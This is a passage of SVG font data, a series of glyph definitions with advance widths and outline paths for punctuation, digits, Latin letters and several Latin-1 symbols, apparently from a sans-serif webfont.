<glyph unicode="&#x22;" horiz-adv-x="656" d="M50 1039v524h230v-275l-102 -249h-128zM376 1039v524h230v-275l-102 -249h-128z" />
<glyph unicode="#" horiz-adv-x="1219" d="M48 410v169h256l51 290h-232v171h262l73 416h183l-73 -416h192l74 416h183l-73 -416h220v-171h-250l-51 -290h225v-169h-254l-72 -410h-184l72 410h-192l-71 -410h-184l72 410h-227zM488 579h191l51 290h-192z" />
<glyph unicode="$" horiz-adv-x="1175" d="M96 449l2 5h285q0 -134 61.5 -192t156.5 -58q91 0 139.5 48.5t48.5 130.5q0 81 -46.5 132t-159.5 95q-222 81 -329.5 180.5t-107.5 280.5q0 168 107.5 275.5t289.5 126.5v215h159v-217q176 -26 276.5 -147t98.5 -314l-3 -5h-285q0 118 -48.5 182t-132.5 64 q-86 0 -128 -49.5t-42 -131.5q0 -78 44.5 -126.5t163.5 -95.5q221 -87 327.5 -186t106.5 -277q0 -174 -107 -278t-291 -123v-198h-159v197q-187 19 -309 132.5t-118 333.5z" />
<glyph unicode="%" horiz-adv-x="1513" d="M95 1099v77q0 129 83.5 215t232.5 86q151 0 234 -85.5t83 -215.5v-77q0 -129 -83 -214t-232 -85q-150 0 -234 85t-84 214zM289 1099q0 -58 32 -97.5t92 -39.5q58 0 89.5 39.5t31.5 97.5v77q0 58 -32 98.5t-91 40.5t-90.5 -40.5t-31.5 -98.5v-77zM319 184l711 1138 l142 -75l-711 -1138zM791 280v77q0 128 84 214t233 86q150 0 233.5 -85.5t83.5 -214.5v-77q0 -130 -83 -215t-232 -85q-150 0 -234.5 85.5t-84.5 214.5zM985 280q0 -57 34.5 -97.5t90.5 -40.5q65 0 93 37.5t28 100.5v77q0 57 -32 97.5t-91 40.5q-60 0 -91.5 -40.5 t-31.5 -97.5v-77z" />
<glyph unicode="&#x26;" horiz-adv-x="1346" d="M61 392q0 118 65 203.5t198 178.5q-68 92 -101.5 168t-33.5 155q0 173 108 276.5t289 103.5q159 0 258.5 -98.5t99.5 -238.5q0 -98 -49 -179t-134 -142l-93 -66l276 -322q36 60 56 130t20 148h218q0 -138 -34 -254t-104 -206l208 -244l-2 -5h-324l-77 89 q-85 -55 -175 -82.5t-193 -27.5q-218 0 -347 114.5t-129 298.5zM353 407q0 -89 55 -146.5t144 -57.5q53 0 106 13.5t102 40.5l-300 348l-19 -13q-51 -48 -69.5 -93.5t-18.5 -91.5zM450 1100q0 -43 21.5 -88.5t64.5 -100.5l86 56q56 36 75.5 74t19.5 83q0 50 -36.5 89 t-95.5 39q-65 0 -100 -43.5t-35 -108.5z" />
<glyph unicode="'" horiz-adv-x="330" d="M50 1008v552h230v-269l-102 -283h-128z" />
<glyph unicode="(" horiz-adv-x="711" d="M124 570v22q0 392 152 665.5t344 354.5h6l53 -146q-131 -98 -220 -316t-89 -556v-26q0 -339 89 -556.5t220 -318.5l-53 -143h-6q-192 81 -344 354t-152 666z" />
<glyph unicode=")" horiz-adv-x="713" d="M31 -307q129 98 219 317t90 558v26q0 336 -91 556.5t-218 319.5l54 142h6q194 -80 352.5 -359t158.5 -661v-22q0 -383 -158.5 -661.5t-352.5 -358.5h-6z" />
<glyph unicode="*" horiz-adv-x="908" d="M27 1055l57 177l297 -123l-18 347h187l-19 -353l291 120l56 -180l-306 -89l200 -265l-152 -110l-174 290l-173 -281l-153 106l209 272z" />
<glyph unicode="+" horiz-adv-x="1117" d="M56 560v252h362v394h276v-394h360v-252h-360v-414h-276v414h-362z" />
<glyph unicode="," horiz-adv-x="528" d="M63 -302l70 324v228h284v-237l-159 -315h-195z" />
<glyph unicode="-" horiz-adv-x="801" d="M113 510v225h564v-225h-564z" />
<glyph unicode="." horiz-adv-x="596" d="M144 0v256h292v-256h-292z" />
<glyph unicode="/" horiz-adv-x="825" d="M-14 -125l534 1581h284l-534 -1581h-284z" />
<glyph unicode="0" horiz-adv-x="1175" d="M95 567v321q0 288 132.5 438.5t359.5 150.5q226 0 359.5 -150.5t133.5 -438.5v-321q0 -289 -132.5 -438.5t-358.5 -149.5q-228 0 -361 149.5t-133 438.5zM386 539q0 -176 51.5 -256t151.5 -80q98 0 149 80t51 256v379q0 173 -52 253.5t-150 80.5q-99 0 -150 -80t-51 -254 v-379z" />
<glyph unicode="1" horiz-adv-x="1175" d="M171 1198v206l588 52v-1456h-292v1198h-296z" />
<glyph unicode="2" horiz-adv-x="1175" d="M76 1007q-5 197 129.5 333.5t362.5 136.5q225 0 353.5 -117t128.5 -312q0 -132 -72.5 -243.5t-239.5 -292.5l-259 -283l2 -5h612v-224h-994v191l471 505q102 117 145 197.5t43 149.5q0 92 -49.5 150.5t-140.5 58.5q-101 0 -153.5 -68.5t-52.5 -182.5h-284z" />
<glyph unicode="3" horiz-adv-x="1175" d="M70 390l2 6h283q0 -84 60 -138.5t152 -54.5q101 0 159.5 56t58.5 152q0 115 -57.5 168.5t-169.5 53.5h-164v219h164q104 0 154 54.5t50 151.5q0 88 -50 141t-145 53q-82 0 -138 -48t-56 -126h-283l-2 6q-6 171 131 282t340 111q226 0 360.5 -108t134.5 -308 q0 -95 -60 -180.5t-165 -133.5q121 -43 184.5 -132t63.5 -207q0 -200 -145.5 -314.5t-372.5 -114.5q-203 0 -348.5 107.5t-140.5 303.5z" />
<glyph unicode="4" horiz-adv-x="1175" d="M57 491l604 965h294v-914h165v-226h-165v-316h-291v316h-594zM329 542h335v524l-6 2l-23 -41z" />
<glyph unicode="5" horiz-adv-x="1175" d="M110 390l2 5l281 14q0 -97 55 -151.5t144 -54.5q102 0 150.5 72.5t48.5 189.5q0 126 -52 202t-154 76q-84 0 -128.5 -31t-63.5 -84l-257 17l84 811h812v-234h-573l-40 -336q40 30 97 49.5t126 20.5q210 3 325.5 -127t115.5 -362q0 -210 -126.5 -349t-364.5 -139 q-201 0 -344 109.5t-138 301.5z" />
<glyph unicode="6" horiz-adv-x="1175" d="M99 569v284q0 286 165 455t420 169q82 0 151.5 -15.5t139.5 -45.5l-52 -214q-66 23 -117.5 34.5t-119.5 11.5q-133 0 -213.5 -99.5t-74.5 -275.5l3 -5q49 51 124 80t169 29q195 0 305.5 -138.5t110.5 -353.5q0 -220 -136.5 -363t-353.5 -143q-231 0 -376 156.5 t-145 433.5zM391 562q0 -173 62.5 -266t166.5 -93q90 0 144.5 82.5t54.5 199.5q0 121 -55 196t-147 75q-81 0 -138 -26t-88 -71v-97z" />
<glyph unicode="7" horiz-adv-x="1175" d="M60 1231v225h1029v-225q-234 -274 -319.5 -511t-122.5 -572l-14 -148h-292l14 148q34 321 146 589.5t307 493.5h-748z" />
<glyph unicode="8" horiz-adv-x="1175" d="M91 398q0 118 66.5 208.5t183.5 140.5q-102 47 -159 130.5t-57 192.5q0 194 127 300.5t335 106.5q207 0 335 -106.5t128 -300.5q0 -109 -57.5 -193t-158.5 -131q116 -49 183 -140t67 -208q0 -202 -137 -310.5t-358 -108.5q-223 0 -360.5 108.5t-137.5 310.5zM384 418 q0 -100 56 -157.5t149 -57.5q91 0 147 58t56 157q0 98 -57 157t-148 59q-92 0 -147.5 -59t-55.5 -157zM417 1057q0 -91 45.5 -144.5t126.5 -53.5q79 0 124.5 53.5t45.5 144.5q0 88 -46.5 141.5t-125.5 53.5q-80 0 -125 -52.5t-45 -142.5z" />
<glyph unicode="9" horiz-adv-x="1175" d="M82 970q0 218 138 362.5t351 144.5q223 0 362 -153.5t139 -431.5v-344q0 -265 -155.5 -417t-396.5 -152q-76 0 -156.5 15.5t-149.5 45.5l34 211q65 -25 128.5 -36.5t143.5 -11.5q115 0 187.5 85.5t72.5 244.5v72q-49 -62 -116.5 -94t-145.5 -32q-203 0 -319.5 132.5 t-116.5 358.5zM373 970q0 -124 50.5 -200.5t143.5 -76.5q72 0 126 27t87 72v134q0 160 -56 243t-152 83q-88 0 -143.5 -82t-55.5 -200z" />
<glyph unicode=":" horiz-adv-x="582" d="M144 0v256h292v-256h-292zM144 876v256h292v-256h-292z" />
<glyph unicode=";" horiz-adv-x="562" d="M114 -302l70 324v228h284v-237l-159 -315h-195zM145 876v256h292v-256h-292z" />
<glyph unicode="&#x3c;" horiz-adv-x="1043" d="M54 436v227l862 366v-272l-577 -207v-6l577 -203v-272z" />
<glyph unicode="=" horiz-adv-x="1181" d="M136 332v229h896v-229h-896zM136 763v229h896v-229h-896z" />
<glyph unicode="&#x3e;" horiz-adv-x="1058" d="M119 69v270l586 209v6l-586 206v269l872 -366v-227z" />
<glyph unicode="?" horiz-adv-x="1021" d="M32 1081q-3 192 126.5 294t337.5 102q224 0 351.5 -113.5t127.5 -308.5q0 -127 -74.5 -235t-186.5 -181q-61 -47 -80 -94.5t-19 -130.5h-291q1 140 41.5 205t161.5 158q71 58 113.5 125t42.5 150q0 92 -48.5 144t-138.5 52q-74 0 -125.5 -44t-52.5 -129h-284zM323 0v250 h294v-250h-294z" />
<glyph unicode="@" horiz-adv-x="1817" d="M66 478q18 427 255.5 683.5t625.5 256.5q387 0 593 -242.5t190 -662.5q-9 -218 -128 -376t-356 -158q-78 0 -135 44t-81 123q-44 -82 -109.5 -123t-153.5 -41q-141 0 -216.5 119t-55.5 315q25 254 143.5 407t287.5 153q116 0 186.5 -26t154.5 -80l-3 -4h5l-51 -573 q-7 -95 14 -130t57 -35q115 0 184.5 109t77.5 276q16 353 -136.5 551t-471.5 198q-303 0 -484 -213t-196 -571q-17 -355 146 -560t469 -205q85 0 175.5 20t155.5 50l38 -147q-67 -42 -170.5 -65.5t-202.5 -23.5q-396 0 -610.5 249t-197.5 682zM720 416q-10 -127 18.5 -192.5 t92.5 -65.5q56 0 101.5 26t81.5 96v6.5t1 6.5l44 496q-23 7 -46 11t-48 4q-111 0 -169 -96.5t-76 -291.5z" />
<glyph unicode="A" horiz-adv-x="1311" d="M12 0l501 1456h299l499 -1456h-295l-99 314h-511l-99 -314h-295zM478 543h367l-180 572h-6z" />
<glyph unicode="B" horiz-adv-x="1314" d="M136 0v1456h492q257 0 401 -100t144 -299q0 -101 -53.5 -180.5t-155.5 -119.5q131 -28 196.5 -120t65.5 -213q0 -209 -138 -316.5t-391 -107.5h-561zM428 224h269q116 0 177 50.5t61 149.5q0 107 -52 163.5t-164 56.5h-291v-420zM428 846h210q117 0 180 48t63 140 q0 101 -63.5 149t-189.5 48h-200v-385z" />
<glyph unicode="C" horiz-adv-x="1309" d="M93 583v289q0 265 160 435t416 170q270 -1 422 -139q148 -135 148 -365v-12l-2 -6h-284q0 144 -69 220.5t-215 76.5q-131 0 -208 -106.5t-77 -271.5v-291q0 -167 81 -273.5t219 -106.5q137 0 202.5 73.5t65.5 218.5h283l2 -6v-12q1 -227 -143 -361q-148 -138 -410 -137 q-263 0 -427 169t-164 435z" />
<glyph unicode="D" horiz-adv-x="1342" d="M136 0v1456h500q267 0 440 -170.5t173 -437.5v-241q0 -268 -173 -437.5t-440 -169.5h-500zM428 224h193q157 0 246 106t89 277v243q0 169 -89 275t-246 106h-193v-1007z" />
<glyph unicode="E" horiz-adv-x="1176" d="M136 0v1456h995v-225h-703v-366h603v-225h-603v-416h705v-224h-997z" />
<glyph unicode="F" horiz-adv-x="1182" d="M136 0v1456h1004v-225h-712v-401h610v-225h-610v-605h-292z" />
<glyph unicode="G" horiz-adv-x="1369" d="M99 576v304q0 264 162.5 430.5t418.5 166.5q266 0 407.5 -129.5t144.5 -340.5l-2 -6h-275q-8 116 -74 183.5t-193 67.5q-134 0 -216 -103.5t-82 -266.5v-306q0 -166 85 -269.5t229 -103.5q102 0 164 21t94 52v270h-258v202h550v-549q-65 -86 -202.5 -153t-347.5 -67 q-267 0 -436 166t-169 431z" />
<glyph unicode="H" horiz-adv-x="1450" d="M136 0v1456h292v-626h594v626h291v-1456h-291v605h-594v-605h-292z" />
<glyph unicode="I" horiz-adv-x="601" d="M154 0v1456h292v-1456h-292z" />
<glyph unicode="J" horiz-adv-x="1169" d="M63 417l2 6h284q0 -115 55 -167.5t148 -52.5q81 0 137.5 62.5t56.5 171.5v1019h291v-1019q0 -211 -137.5 -334.5t-347.5 -123.5q-228 0 -361 111q-128 107 -128 311v16z" />
<glyph unicode="K" horiz-adv-x="1323" d="M136 0v1456h292v-595h127l386 595h357l-490 -678l529 -778h-356l-391 608h-162v-608h-292z" />
<glyph unicode="L" horiz-adv-x="1108" d="M136 0v1456h292v-1232h648v-224h-940z" />
<glyph unicode="M" horiz-adv-x="1787" d="M136 0v1456h381l371 -1073h6l374 1073h382v-1456h-292v434l28 643l-6 1l-390 -1078h-196l-388 1074l-6 -1l28 -639v-434h-292z" />
<glyph unicode="N" horiz-adv-x="1450" d="M136 0v1456h292l588 -994l6 1v993h291v-1456h-291l-588 995l-6 -1v-994h-292z" />
<glyph unicode="O" horiz-adv-x="1399" d="M92 597v262q0 267 167.5 442.5t436.5 175.5q271 0 441 -175.5t170 -442.5v-262q0 -268 -169.5 -443t-440.5 -175q-269 0 -437 175t-168 443zM383 597q0 -173 83 -282t231 -109q150 0 234 109t84 282v264q0 170 -85 279t-234 109t-231 -108.5t-82 -279.5v-264z" />
<glyph unicode="P" horiz-adv-x="1334" d="M136 0v1456h580q251 0 395 -128t144 -337t-144 -336t-395 -127h-288v-528h-292zM428 753h288q122 0 185 66.5t63 169.5q0 105 -62.5 173.5t-185.5 68.5h-288v-478z" />
<glyph unicode="Q" horiz-adv-x="1433" d="M92 597v262q0 267 167.5 442.5t436.5 175.5q271 0 441 -175.5t170 -442.5v-262q0 -132 -43 -244.5t-123 -195.5l241 -236l-191 -156l-262 254q-54 -19 -112 -29.5t-120 -10.5q-269 0 -437 175t-168 443zM383 597q0 -173 83 -282t231 -109q150 0 234 109t84 282v264 q0 170 -85 279t-234 109t-231 -108.5t-82 -279.5v-264z" />
<glyph unicode="R" horiz-adv-x="1354" d="M136 0v1456h549q249 0 389.5 -113.5t140.5 -316.5q0 -113 -59 -194t-173 -131q129 -38 185.5 -127t56.5 -220v-107q0 -61 16.5 -127.5t56.5 -98.5v-21h-301q-40 32 -52 107t-12 142v103q0 109 -59.5 169.5t-167.5 60.5h-278v-582h-292zM428 807h252q123 0 183.5 52 t60.5 154q0 100 -60.5 159t-178.5 59h-257v-424z" />
<glyph unicode="S" horiz-adv-x="1299" d="M90 445l2 6h284q0 -130 79.5 -190.5t221.5 -60.5q119 0 182 49t63 131q0 84 -59.5 135t-208.5 96q-260 75 -393 178t-133 282t152.5 292.5t389.5 113.5q240 1 391 -127q146 -123 146 -303v-12l-2 -6h-283q0 101 -67.5 163.5t-189.5 62.5q-117 0 -181 -52t-64 -133 q0 -74 68.5 -121.5t236.5 -100.5q241 -67 365 -177t124 -289q0 -187 -147.5 -295t-389.5 -108q-238 1 -415 123q-172 119 -172 331v12z" />
<glyph unicode="T" horiz-adv-x="1169" d="M28 1231v225h1114v-225h-412v-1231h-292v1231h-410z" />
<glyph unicode="U" horiz-adv-x="1407" d="M120 490v966h293v-966q0 -144 77 -215.5t212 -71.5q137 0 215 71t78 216v966h293v-966q0 -245 -162 -378t-424 -133q-261 0 -421.5 133t-160.5 378z" />
<glyph unicode="V" horiz-adv-x="1303" d="M7 1456h308l315 -1069l18 -79h6l17 77l317 1071h308l-495 -1456h-300z" />
<glyph unicode="W" horiz-adv-x="1815" d="M24 1456h286l209 -997l6 -1l273 998h215l275 -998h6l208 998h285l-340 -1456h-271l-267 961h-6l-267 -961h-271z" />
<glyph unicode="X" horiz-adv-x="1303" d="M31 0l443 734l-432 722h338l269 -516l273 516h340l-432 -722l457 -734h-353l-281 525l-281 -525h-341z" />
<glyph unicode="Y" horiz-adv-x="1292" d="M5 1456h320l318 -671h6l318 671h320l-500 -944v-512h-291v527z" />
<glyph unicode="Z" horiz-adv-x="1206" d="M77 0v152l692 1079h-691v225h1047v-146l-695 -1086h712v-224h-1065z" />
<glyph unicode="[" horiz-adv-x="570" d="M119 -336v2027h434v-216h-141v-1595h141v-216h-434z" />
<glyph unicode="\" horiz-adv-x="863" d="M2 1456h289l608 -1581h-289z" />
<glyph unicode="]" horiz-adv-x="570" d="M13 -120h142v1595h-142v216h434v-2027h-434v216z" />
<glyph unicode="^" horiz-adv-x="896" d="M44 729l299 727h212l299 -727h-231l-165 413l-8 34h-6l-7 -34l-162 -413h-231z" />
<glyph unicode="_" horiz-adv-x="914" d="M1 0h910v-219h-910v219z" />
<glyph unicode="`" horiz-adv-x="678" d="M77 1472l2 6h309l197 -266h-237z" />
<glyph unicode="a" horiz-adv-x="1100" d="M55 305q0 159 122.5 246.5t357.5 87.5h163v86q0 78 -41 121t-121 43q-71 0 -109.5 -34.5t-38.5 -95.5l-282 1l-1 6v14q0 128 119 222q126 100 331 100q194 0 315 -98.5t121 -280.5v-447q0 -76 11.5 -143t36.5 -133h-292q-16 37 -27.5 78t-16.5 84q-45 -79 -118.5 -131 t-175.5 -52q-170 0 -262 87.5t-92 238.5zM346 315q0 -54 36 -87t98 -33q77 0 137 38t81 88v153h-163q-93 0 -141 -46.5t-48 -112.5z" />
<glyph unicode="b" d="M112 0v1560h291v-593q47 65 112.5 100t150.5 35q206 0 314 -155.5t108 -414.5v-21q0 -242 -108 -387t-312 -145q-94 0 -164.5 39.5t-119.5 115.5l-22 -134h-250zM403 307q27 -49 74.5 -75t116.5 -26q113 0 158 79.5t45 225.5v21q0 158 -46.5 250.5t-158.5 92.5 q-68 0 -115 -28.5t-74 -81.5v-458z" />
<glyph unicode="c" horiz-adv-x="1060" d="M62 525v30q0 239 130.5 393t372.5 154q201 0 323 -114q119 -110 118 -288v-12l-2 -6h-266q0 84 -46 139.5t-127 55.5q-116 0 -163.5 -90t-47.5 -232v-30q0 -145 47.5 -233.5t164.5 -88.5q78 0 125 45.5t47 121.5h265l3 -6v-10q0 -156 -124 -264q-128 -110 -316 -111 q-242 0 -373 153t-131 393z" />
<glyph unicode="d" d="M67 511v21q0 256 110.5 413t311.5 157q81 0 146 -35t114 -100v593h293v-1560h-251l-24 132q-51 -75 -120.5 -114t-159.5 -39q-199 0 -309.5 146t-110.5 386zM358 511q0 -142 48 -223.5t156 -81.5q63 0 110 25.5t77 74.5v461q-30 51 -76.5 79.5t-108.5 28.5 q-107 0 -156.5 -95t-49.5 -248v-21z" />
<glyph unicode="e" horiz-adv-x="1084" d="M77 510v40q1 241 133 397q132 155 352 155h3q219 0 340 -132t121 -357v-159h-646l-2 -6q8 -107 71.5 -176t172.5 -69q97 0 161 19.5t140 61.5l79 -180q-66 -54 -173 -89.5t-238 -35.5q-234 0 -374 150t-140 381zM379 652l3 -5h358v26q0 93 -43.5 148.5t-131.5 55.5 q-81 0 -128 -62t-58 -163z" />
<glyph unicode="f" horiz-adv-x="732" d="M27 877v205h161v120q0 182 105 280.5t295 98.5q37 0 75.5 -5.5t84.5 -15.5l-25 -217q-24 4 -46.5 7t-52.5 3q-71 0 -107.5 -39t-36.5 -112v-120h215v-205h-215v-877h-292v877h-161z" />
<glyph unicode="g" d="M67 511v21q0 256 111.5 413t312.5 157q91 0 160 -41t118 -117l23 138h252v-1077q0 -211 -138.5 -326.5t-385.5 -115.5q-82 0 -174 22.5t-170 61.5l54 218q67 -32 136.5 -48.5t151.5 -16.5q120 0 176.5 50t56.5 156v98q-48 -61 -113 -93t-149 -32q-199 0 -310.5 146.5 t-111.5 385.5zM359 511q0 -142 48 -223.5t156 -81.5q67 0 113.5 24.5t74.5 71.5v470q-28 49 -74.5 76t-111.5 27q-107 0 -156.5 -95t-49.5 -248v-21z" />
<glyph unicode="h" d="M105 0v1560h292v-615q51 74 125 115.5t164 41.5q169 0 265.5 -112.5t96.5 -347.5v-642h-292v644q0 126 -44.5 178.5t-132.5 52.5q-60 0 -106 -21.5t-76 -60.5v-793h-292z" />
<glyph unicode="i" horiz-adv-x="547" d="M127 0v1082h292v-1082h-292zM127 1341v219h292v-219h-292z" />
<glyph unicode="j" horiz-adv-x="543" d="M-98 -420l14 223q23 -6 46 -9t49 -3q59 0 91 41.5t32 127.5v1122h293v-1122q0 -190 -101 -293.5t-281 -103.5q-40 0 -73 4t-70 13zM128 1343v217h293v-217h-293z" />
<glyph unicode="k" horiz-adv-x="1097" d="M112 0v1560h292v-885h72l251 407h338l-346 -490l399 -592h-335l-299 453h-80v-453h-292z" />
<glyph unicode="l" horiz-adv-x="547" d="M127 0v1560h292v-1560h-292z" />
<glyph unicode="m" horiz-adv-x="1772" d="M112 0v1082h271l12 -143q52 78 130.5 120.5t181.5 42.5q104 0 178 -46t112 -139q50 87 130 136t188 49q160 0 252.5 -110.5t92.5 -336.5v-655h-292v656q0 123 -40 171t-119 48q-62 0 -107.5 -27.5t-72.5 -76.5q0 -19 1 -32.5t1 -27.5v-711h-291v656q0 120 -40 169.5 t-120 49.5q-59 0 -103.5 -22.5t-73.5 -63.5v-789h-291z" />
<glyph unicode="n" d="M107 0v1082h272l13 -155q54 83 133 129t177 46q164 0 256 -103t92 -323v-676h-293v675q0 109 -44 154.5t-133 45.5q-58 0 -104 -23.5t-77 -66.5v-785h-292z" />
<glyph unicode="o" d="M67 530v21q0 242 135 396.5t374 154.5q240 0 376 -154t136 -397v-21q0 -244 -135.5 -397.5t-374.5 -153.5q-240 0 -375.5 153.5t-135.5 397.5zM358 530q0 -148 52 -237.5t168 -89.5q113 0 165.5 90t52.5 237v21q0 144 -53 235t-167 91q-113 0 -165.5 -91.5t-52.5 -234.5 v-21z" />
<glyph unicode="p" d="M112 -416v1498h263l17 -128q48 71 115.5 109.5t157.5 38.5q201 0 312 -157t111 -413v-21q0 -240 -111 -386t-310 -146q-85 0 -151 31.5t-113 92.5v-519h-291zM403 297q27 -46 73.5 -70t114.5 -24q106 0 155.5 83t49.5 225v21q0 153 -51 248t-156 95q-66 0 -112.5 -27 t-73.5 -77v-474z" />
<glyph unicode="q" d="M67 511v21q0 256 110.5 413t311.5 157q90 0 158 -39.5t117 -113.5l27 133h248v-1498h-292v517q-48 -60 -112.5 -91t-147.5 -31q-199 0 -309.5 146t-110.5 386zM358 511q0 -142 48 -225t156 -83q64 0 110 24t75 70v480q-29 48 -74.5 74t-108.5 26q-107 0 -156.5 -96 t-49.5 -249v-21z" />
<glyph unicode="r" horiz-adv-x="717" d="M112 0v1082h271l13 -160q38 85 98.5 132.5t139.5 47.5q22 0 40.5 -3.5t37.5 -8.5l-31 -259l-107 3q-65 0 -107 -27t-64 -76v-731h-291z" />
<glyph unicode="s" horiz-adv-x="1056" d="M64 338l2 6h267q3 -87 57 -126t141 -39q81 0 123.5 32t42.5 87q0 48 -46.5 83t-172.5 62q-192 39 -289.5 115.5t-97.5 208.5q0 140 117.5 237.5t314.5 97.5q207 0 329 -97q118 -93 118 -233v-12l-2 -6h-282q0 65 -41.5 106t-121.5 41q-71 0 -111.5 -34.5t-40.5 -86.5 q0 -50 42.5 -82t172.5 -57q200 -40 297 -117.5t97 -213.5q0 -146 -125 -238.5t-330 -92.5q-215 -1 -341 109q-120 105 -120 237v13z" />
<glyph unicode="t" horiz-adv-x="715" d="M9 877v205h158v265h292v-265h182v-205h-182v-551q0 -63 26 -90t70 -27q23 0 39.5 2.5t38.5 8.5l25 -211q-44 -15 -86 -22.5t-91 -7.5q-151 0 -232.5 83t-81.5 263v552h-158z" />
<glyph unicode="u" d="M105 429v653h291v-655q0 -118 40 -169.5t118 -51.5q70 0 120 22.5t82 66.5v787h292v-1082h-249l-26 156q-50 -85 -127 -131t-177 -46q-171 0 -267.5 109.5t-96.5 340.5z" />
<glyph unicode="v" horiz-adv-x="1046" d="M16 1082h305l182 -679l19 -100h6l20 100l178 679h305l-368 -1082h-279z" />
<glyph unicode="w" horiz-adv-x="1507" d="M29 1082h274l143 -693h6l202 693h195l204 -695h6l141 695h274l-275 -1082h-244l-201 644h-6l-201 -644h-243z" />
<glyph unicode="x" horiz-adv-x="1046" d="M19 0l337 547l-327 535h328l162 -344h6l166 344h330l-326 -535l337 -547h-329l-177 359l-177 -359h-330z" />
<glyph unicode="y" horiz-adv-x="1046" d="M5 1082h314l183 -628l12 -60h6l207 688h314l-439 -1244q-46 -116 -125 -195.5t-237 -79.5q-37 0 -68.5 6t-76.5 17l34 213q13 -2 28 -4t27 -2q72 0 111 35.5t60 88.5l34 84z" />
<glyph unicode="z" horiz-adv-x="1046" d="M75 0v172l515 684h-499v226h866v-167l-519 -691h536v-224h-899z" />
<glyph unicode="{" horiz-adv-x="676" d="M48 518v201q90 0 133.5 54.5t43.5 155.5v203q0 171 82.5 290.5t277.5 174.5l56 -157q-85 -31 -120 -110.5t-35 -197.5v-203q0 -104 -44.5 -184.5t-134.5 -125.5q90 -47 134.5 -127.5t44.5 -182.5v-203q0 -118 35 -197.5t120 -110.5l-56 -158q-195 55 -277.5 175 t-82.5 291v203q0 99 -43.5 154t-133.5 55z" />
<glyph unicode="|" horiz-adv-x="519" d="M173 -270v1726h176v-1726h-176z" />
<glyph unicode="}" horiz-adv-x="676" d="M34 -202q85 31 120 110.5t35 197.5v203q0 104 46 184t140 125q-94 45 -140 125.5t-46 185.5v203q0 118 -35 197.5t-120 110.5l56 157q194 -55 277 -174.5t83 -290.5v-203q0 -101 43 -155.5t135 -54.5v-201q-92 0 -135 -55t-43 -154v-203q0 -171 -83 -291t-277 -175z" />
<glyph unicode="~" horiz-adv-x="1327" d="M105 448q0 162 86.5 269.5t223.5 107.5q83 0 158.5 -33.5t151.5 -99.5q49 -45 86.5 -64.5t81.5 -19.5q50 0 87 52t37 125l203 -27q0 -161 -88.5 -270.5t-223.5 -109.5q-85 0 -157 31.5t-150 101.5q-52 44 -89.5 64t-81.5 20q-52 0 -87.5 -51t-35.5 -122z" />
<glyph unicode="&#xa1;" horiz-adv-x="580" d="M142 -374v953h292v-953h-292zM142 825v257h292v-257h-292z" />
<glyph unicode="&#xa2;" horiz-adv-x="1181" d="M72 525v30q0 218 110.5 367.5t317.5 174.5v221h200v-229q148 -34 235 -141.5t87 -265.5h-274q0 84 -46 139.5t-127 55.5q-116 0 -163.5 -90t-47.5 -232v-30q0 -145 47.5 -233.5t164.5 -88.5q78 0 125 45.5t47 121.5h267l2 -5q3 -135 -85.5 -237t-231.5 -135v-238h-200 v229q-207 23 -317.5 172.5t-110.5 368.5z" />
<glyph unicode="&#xa3;" horiz-adv-x="1216" d="M92 588v225h155l-8 214q0 210 120.5 330t322.5 120q215 0 333.5 -111.5t114.5 -294.5l-2 -6h-284q0 96 -46 141.5t-117 45.5q-70 0 -110 -58.5t-40 -166.5l10 -214h355v-225h-345l4 -85q0 -78 -30 -150t-86 -129h713v-224h-996v224h10q47 12 70.5 95t23.5 171l-4 98h-164 z" />
<glyph unicode="&#xa4;" horiz-adv-x="1417" d="M80 118l135 137q-49 76 -74.5 165.5t-25.5 187.5q0 101 28 194t81 171l-144 147l141 144l142 -145q74 55 162.5 85t185.5 30q96 0 185 -30.5t164 -86.5l144 148l142 -145l-148 -151q51 -78 79 -169.5t28 -191.5q0 -97 -25.5 -185.5t-72.5 -163.5l139 -141l-142 -145 l-132 134q-77 -62 -169 -94.5t-192 -32.5q-101 0 -193.5 32.5t-167.5 93.5l-129 -132zM301 608q0 -185 119 -312t291 -127q170 0 289.5 127.5t119.5 311.5q0 183 -119.5 310t-289.5 127q-172 0 -291 -127t-119 -310z" />
<glyph unicode="&#xa5;" horiz-adv-x="1253" d="M22 1456h321l280 -608h6l281 608h320l-382 -714h244v-200h-324v-110h324v-200h-324v-232h-292v232h-339v200h339v110h-339v200h267z" />
<glyph unicode="&#xa6;" horiz-adv-x="517" d="M127 -270v795h262v-795h-262zM127 698v758h262v-758h-262z" />
<glyph unicode="&#xa7;" horiz-adv-x="1287" d="M94 536q0 89 42 158t121 113q-69 50 -103 120.5t-34 168.5q0 172 141.5 276.5t378.5 104.5q243 0 380.5 -111t132.5 -311l-2 -6h-283q0 88 -60 145.5t-168 57.5q-114 0 -171 -43.5t-57 -110.5q0 -75 55.5 -113.5t232.5 -86.5q247 -64 363.5 -157.5t116.5 -265.5 q0 -91 -42 -159t-121 -111q68 -51 102.5 -121t34.5 -168q0 -177 -140 -277t-377 -100q-232 0 -387.5 99.5t-150.5 317.5l2 6l283 1q0 -106 72.5 -152t180.5 -46q107 0 166.5 41.5t59.5 108.5t-61 107.5t-230 90.5q-244 64 -361 157.5t-117 265.5zM385 562q0 -80 55.5 -121.5 t232.5 -93.5q34 -10 68.5 -20t69.5 -21q39 22 60.5 59t21.5 85q0 71 -62 116t-232 97q-40 10 -74 21t-65 22q-38 -22 -56.5 -59t-18.5 -85z" />
<glyph unicode="&#xa8;" horiz-adv-x="1090" d="M156 1252v204h266v-204h-266zM656 1252v204h266v-204h-266z" />
<glyph unicode="&#xa9;" horiz-adv-x="1606" d="M86 729q0 315 207 531t503 216q295 0 502.5 -216t207.5 -531q0 -316 -208 -533t-502 -217q-296 0 -503 217t-207 533zM208 729q0 -264 171.5 -444.5t416.5 -180.5q244 0 415.5 180.5t171.5 444.5q0 263 -171.5 442.5t-415.5 179.5q-246 0 -417 -179.5t-171 -442.5z M433 669v119q0 173 94.5 280t254.5 107q157 0 245.5 -79.5t84.5 -228.5l-2 -6h-148q0 94 -45 136.5t-135 42.5q-94 0 -144 -69t-50 -182v-120q0 -115 50 -183.5t144 -68.5q90 0 134.5 41.5t44.5 137.5h148l2 -6q4 -151 -84 -229.5t-245 -78.5q-160 0 -254.5 106t-94.5 281z " />
